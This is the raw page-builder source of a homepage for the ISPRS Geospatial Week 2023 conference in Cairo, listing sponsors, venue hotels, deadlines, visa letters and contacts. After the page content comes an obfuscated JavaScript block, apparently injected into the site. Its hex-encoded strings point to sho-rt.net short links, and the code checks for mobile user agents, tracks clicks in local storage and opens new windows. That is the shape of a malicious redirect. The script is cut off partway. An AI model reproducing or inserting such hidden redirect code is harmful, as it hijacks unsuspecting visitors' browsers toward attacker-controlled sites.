style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951146401{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951344645{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 size-full\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"160\" height=\"190\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1687571540500{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687564731927{margin-top: 8px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570507588{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Pharaohs Cruising Restaurant</strong></h5>\n<p><img class=\"alignnone size-medium wp-image-4791 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on the Prime Le Lac Du Caire</h5>\n<p><img class=\"alignnone size-medium wp-image-4793 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/6c0414f1-abcc-46a4-8e17-e17eb60be7b5-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( 